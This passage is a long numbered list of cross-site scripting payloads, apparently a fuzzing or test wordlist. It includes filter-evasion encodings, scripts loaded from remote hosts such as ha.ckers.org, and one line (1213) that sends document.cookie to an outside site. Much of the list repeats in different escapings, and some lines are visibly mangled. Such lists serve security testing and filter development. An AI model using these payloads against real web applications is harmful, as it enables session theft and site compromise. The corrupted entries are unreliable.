  1053. &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
  1054. &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
  1055. &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
  1056. &lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
  1057. &lt;? echo(&apos;&lt;SCR)&apos;;
  1058. &lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
  1059. &lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
  1060. &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
  1061. &lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
  1062. &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
  1063. &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
  1064. &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
  1065. &lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
  1066. &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
  1067. &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
  1068. \&quot;;alert(&apos;XSS&apos;);//
  1069. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
  1070. &lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
  1071. &lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1072. &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1073. &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1074. &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1075. &lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
  1076. perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
  1077. perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
  1078. &lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1079. &lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1080. &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  1081. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js
  1082. &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
  1083. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
  1084. &lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
  1085. &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
  1086. &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
  1087. &lt;SCRIPT&gt;a=/XSS/
  1088. &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1089. &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1090. &lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1091. &lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1092. &lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1093. &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1094. &lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1095. &lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
  1096. &lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
  1097. &lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
  1098. &lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
  1099. &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
  1100. &lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
  1101. &lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
  1102. &lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
  1103. &lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
  1104. &lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
  1105. &lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
  1106. &lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
  1107. &lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
  1108. &lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
  1109. <script>document.vulnerable=true;</script>
  1110. <img SRC="jav ascript:document.vulnerable=true;">
  1111. <img SRC="javascript:document.vulnerable=true;">
  1112. <img SRC=" &#14; javascript:document.vulnerable=true;">
  1113. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1114. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1115. <script <B>document.vulnerable=true;</script>
  1116. <img SRC="javascript:document.vulnerable=true;"
  1117. <iframe src="javascript:document.vulnerable=true; <
  1118. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1119. \";document.vulnerable=true;;//
  1120. </title><SCRIPT>document.vulnerable=true;</script>
  1121. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1122. <body BACKGROUND="javascript:document.vulnerable=true;">
  1123. <body ONLOAD=document.vulnerable=true;>
  1124. <img DYNSRC="javascript:document.vulnerable=true;">
  1125. <img LOWSRC="javascript:document.vulnerable=true;">
  1126. <bgsound SRC="javascript:document.vulnerable=true;">
  1127. <br SIZE="&{document.vulnerable=true}">
  1128. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1129. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1130. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1131. <img SRC='vbscript:document.vulnerable=true;'>
  1132. 1script3document.vulnerable=true;1/script3
  1133. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1134. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1135. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1136. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1137. <table BACKGROUND="javascript:document.vulnerable=true;">
  1138. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1139. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1140. <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
  1141. <div STYLE="width: expression(document.vulnerable=true);">
  1142. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1143. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1144. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1145. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
  1146. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1147. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1148. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1149. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1150. <base HREF="javascript:document.vulnerable=true;//">
  1151. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1152. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1153. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
  1154. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1155. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
  1156. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1157. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1158. <a href="javascript#document.vulnerable=true;">
  1159. <div onmouseover="document.vulnerable=true;">
  1160. <img src="javascript:document.vulnerable=true;">
  1161. <img dynsrc="javascript:document.vulnerable=true;">
  1162. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1163. <bgsound src="javascript:document.vulnerable=true;">
  1164. &<script>document.vulnerable=true;</script>
  1165. &{document.vulnerable=true;};
  1166. <img src=&{document.vulnerable=true;};>
  1167. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1168. <iframe src="vbscript:document.vulnerable=true;">
  1169. <img src="mocha:document.vulnerable=true;">
  1170. <img src="livescript:document.vulnerable=true;">
  1171. <a href="about:<script>document.vulnerable=true;</script>">
  1172. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1173. <body onload="document.vulnerable=true;">
  1174. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1175. <div style="behaviour: url([link to code]);">
  1176. <div style="binding: url([link to code]);">
  1177. <div style="width: expression(document.vulnerable=true;);">
  1178. <style type="text/javascript">document.vulnerable=true;</style>
  1179. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1180. <style><!--</style><script>document.vulnerable=true;//--></script>
  1181. <<script>document.vulnerable=true;</script>
  1182. <![<!--]]<script>document.vulnerable=true;//--></script>
  1183. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1184. <img src="blah"onmouseover="document.vulnerable=true;">
  1185. <img src="blah>" onmouseover="document.vulnerable=true;">
  1186. <xml src="javascript:document.vulnerable=true;">
  1187. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1188. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1189. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1190. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1191. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1192. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1193. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1194. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  1195. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1196. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1197. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1198. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1199. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1200. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1201. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1202. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1203. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1204. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1205. &quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  1206. &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
  1207. &lt;/br style=a:expression(alert())&gt;
  1208. &lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
  1209. &lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
  1210. perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
  1211. perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
  1212. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1213. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1214. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1215. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1216. "><script>alert('XSS')</script>
  1217. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1218. XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1219. XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1220. </XSS STYLE=xss:expression(alert('XSS'))>
  1221. ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1222. ';';;!--";<;XSS>;=&;{()}
  1223. <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
  1224. <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
  1225. <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1226. <;BASE HREF=";javascript:alert(';XSS';);//";>;
  1227. <;BGSOUND SRC=";javascript:alert(';XSS';);";>;
  1228. <;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
  1229. <;BODY ONLOAD=alert(';XSS';)>;
  1230. <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
  1231. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
  1232. <;DIV STYLE=";width: expression(alert(';XSS';));";>;
  1233. <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
  1234. <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
  1235. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
  1236. <;IMG SRC=";javascript:alert(';XSS';);";>;
  1237. <;IMG SRC=javascript:alert(';XSS';)>;
  1238. <;IMG DYNSRC=";javascript:alert(';XSS';);";>;
  1239. <;IMG LOWSRC=";javascript:alert(';XSS';);";>;
  1240. <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
  1241. exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
  1242. <;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1243. <;IMG SRC=';vbscript:msgbox(";XSS";)';>;
  1244. <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
  1245. <;IMG SRC=";livescript:[code]";>;
  1246. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1247. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
  1248. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
  1249. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
  1250. <;IMG SRC=";mocha:[code]";>;
  1251. <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
  1252. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
  1253. <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
  1254. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);
  1255. <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
  1256. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
  1257. <;XSS STYLE=";xss:expression(alert(';XSS';))";>;
  1258. <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1259. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
  1260. <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
  1261. <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
  1262. <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
  1263. <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
  1264. <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
  1265. <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
  1266. <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
  1267. <;HTML xmlns:xss>;
  1268. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
  1269. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
  1270. <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
  1271. <;HTML>;<;BODY>;
  1272. <;!--[if gte IE 4]>;
  1273. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
  1274. <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
  1275. <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
  1276. <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
  1277. <;? echo(';<;SCR)';;
  1278. <;BR SIZE=";&;{alert(';XSS';)}";>;
  1279. <;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
  1280. <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
  1281. <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
  1282. <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
  1283. <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
  1284. <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
  1285. <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
  1286. <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
  1287. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
  1288. \";;alert(';XSS';);//
  1289. <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
  1290. <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
  1291. <;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>;
  1292. <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
  1293. <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
  1294. <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
  1295. <;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D;
  1296. perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
  1297. perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
  1298. <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
  1299. <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1300. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1301. <;SCRIPT SRC=http://ha.ckers.org/xss.js
  1302. <;SCRIPT SRC=//ha.ckers.org/.j>;
  1303. <;IMG SRC=";javascript:alert(';XSS';)";
  1304. <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
  1305. <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
  1306. <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
  1307. <;SCRIPT>;a=/XSS/
  1308. <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1309. <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1310. <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1311. <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1312. <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1313. <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1314. <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1315. <;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
  1316. <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
  1317. <;A HREF=";http://1113982867/";>;XSS<;/A>;
  1318. <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
  1319. <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
  1320. <;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
  1321. <;A HREF=";//www.google.com/";>;XSS<;/A>;
  1322. <;A HREF=";//google";>;XSS<;/A>;
  1323. <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
  1324. <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
  1325. <;A HREF=";http://google.com/";>;XSS<;/A>;
  1326. <;A HREF=";http://www.google.com./";>;XSS<;/A>;
  1327. <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
  1328. <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
  1329. <script>document.vulnerable=true;</script>
  1330. <img SRC="jav ascript:document.vulnerable=true;">
  1331. <img SRC="javascript:document.vulnerable=true;">
  1332. <img SRC=" &#14; javascript:document.vulnerable=true;">
  1333. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1334. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1335. <script <B>document.vulnerable=true;</script>
  1336. <img SRC="javascript:document.vulnerable=true;"
  1337. <iframe src="javascript:document.vulnerable=true; <
  1338. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1339. \";document.vulnerable=true;;//
  1340. </title><SCRIPT>document.vulnerable=true;</script>
  1341. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1342. <body BACKGROUND="javascript:document.vulnerable=true;">
  1343. <body ONLOAD=document.vulnerable=true;>
  1344. <img DYNSRC="javascript:document.vulnerable=true;">
  1345. <img LOWSRC="javascript:document.vulnerable=true;">
  1346. <bgsound SRC="javascript:document.vulnerable=true;">
  1347. <br SIZE="&{document.vulnerable=true}">
  1348. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1349. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1350. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1351. <img SRC='vbscript:document.vulnerable=true;'>
  1352. 1script3document.vulnerable=true;1/script3
  1353. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1354. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1355. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1356. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1357. <table BACKGROUND="javascript:document.vulnerable=true;">
  1358. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1359. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1360. <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
  1361. <div STYLE="width: expression(document.vulnerable=true);">
  1362. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1363. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1364. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1365. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
